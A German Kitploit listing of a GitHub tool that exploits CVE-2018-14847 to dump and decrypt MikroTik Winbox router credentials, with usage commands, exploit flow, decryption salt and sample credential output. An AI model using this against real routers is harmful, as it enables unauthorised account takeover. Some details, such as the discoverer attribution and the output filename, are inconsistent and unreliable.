Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON | Kitploit
Tools/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
IoT SecurityPassword AttacksVulnerability AnalysisExploitationNetwork SecurityRed Teaming
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Pentest-Werkzeuge — /network

Repository für Skripte zur Netzwerkauditierung und Penetrationstests. Nur auf Geräten mit formeller Autorisierung verwenden.


CVE-2018-14847 — MikroTik Winbox Credential Extractor

Beschreibung

Nutzt die Schwachstelle zum nicht authentifizierten Auslesen von Dateien im Winbox-Dienst von MikroTik RouterOS aus. Der Dateihandler (Handler-ID 2) validiert keine Authentifizierung, sodass ein externer Angreifer die Datei user.dat lesen kann, die alle Benutzer und Passwörter des Geräts enthält.

Die Passwörter werden XOR-verschlüsselt mit dem Schlüssel MD5(Benutzer + "283i4jfkai3389") gespeichert. Das Skript führt die Entschlüsselung automatisch durch.

Betroffene Versionen

BranchVerwundbar bisKorrigierte Version
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

Anforderungen

  • Python 3.x (keine externen Abhängigkeiten)
  • Port 8291 (Winbox) am Ziel erreichbar

Verwendung

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

Beispiele

root@kitploit:~
# Standardziel auf Port 8291
python3 cve_2018_14847.py 192.168.1.1

# Benutzerdefinierter Port
python3 cve_2018_14847.py 192.168.1.1 --port 8291

Ablauf des Exploits

root@kitploit:~
1. Verbinde zu Port 8291 (Winbox)
        ↓
2. Sende FIRST_PAYLOAD — öffne Session + fordere /flash/rw/store/user.dat an
        ↓
3. Extrahiere Session-ID aus Byte 38 der Antwort
        ↓
4. Injiziere Session-ID in Byte 19 von SECOND_PAYLOAD
        ↓
5. Sende SECOND_PAYLOAD — lese die Datei user.dat
        ↓
6. Parse M2-Einträge → extrahiere Benutzer und verschlüsseltes Passwort
        ↓
7. Entschlüssele Passwort: XOR mit MD5(Benutzer + Salt)
        ↓
8. Zeige Anmeldedaten an und speichere in Datei

Erwartete Ausgabe

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  MikroTik Winbox Credential Dump
  Unauthenticated File Read + Password Decryption
  Betroffen: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  Ziel  : 192.168.1.1:8291
  Datum : 2026-05-20 18:06:58

[*] Verbinde zu 192.168.1.1:8291 ...
[+] Verbunden mit Winbox-Dienst.
[*] Sende Payload 1 (Dateianfrage) ...
[+] Antwort erhalten (84 Bytes). Session-ID: 0x35
[*] Sende Payload 2 (lese user.dat) ...
[+] Daten erhalten (312 Bytes).
[*] Analysiere user.dat (257 nutzbare Bytes) ...

═══════════════════════════════════════════════════════
  EXTRAHIERTE ANMELDEDATEN
═══════════════════════════════════════════════════════
  Benutzer : admin
  Passwort : senha123
  Kombi    : admin:senha123
───────────────────────────────────────────────────────
[+] 1 Anmeldedatensatz/-sätze gefunden.
[+] Ergebnis gespeichert unter: mikrotik_1192.168.1.1_20260520_180658.txt

Ausgabedatei

Das Ergebnis wird automatisch gespeichert unter:

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

Beispiel: mikrotik_192.168.1.1_20260520_180658.txt

Enthält: Ziel-IP, Datum, CVE, betroffene Version und alle Paare Benutzer:Passwort.

Referenzen

  • CVE: CVE-2018-14847
  • Exploit-DB: EDB-ID #45170
  • Ursprüngliche Entdeckung: Omid Shojaei (@Dmitriy_area51)
  • Veröffentlichung: April 2018

Ordnerstruktur

root@kitploit:~
/network/
├── README.md                        # diese Datei
├── cve_2018_14847.py                # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md      # Pentest-Bericht CGNAT
├── pentest_roteador_192.168.2.1.md  # Pentest-Bericht Router
└── mikrotik_<IP>_<TIMESTAMP>.txt    # vom Skript generierte Ergebnisse

RECHTLICHER HINWEIS: Diese Werkzeuge sind ausschließlich für die Nutzung in autorisierten Umgebungen bestimmt. Die nicht autorisierte Ausführung gegen Systeme Dritter ist eine Straftat gemäß dem brasilianischen Gesetz 12.737/2012 (Lei Carolina Dieckmann) und Art. 154-A des brasilianischen Strafgesetzbuchs.

Tool herunterladen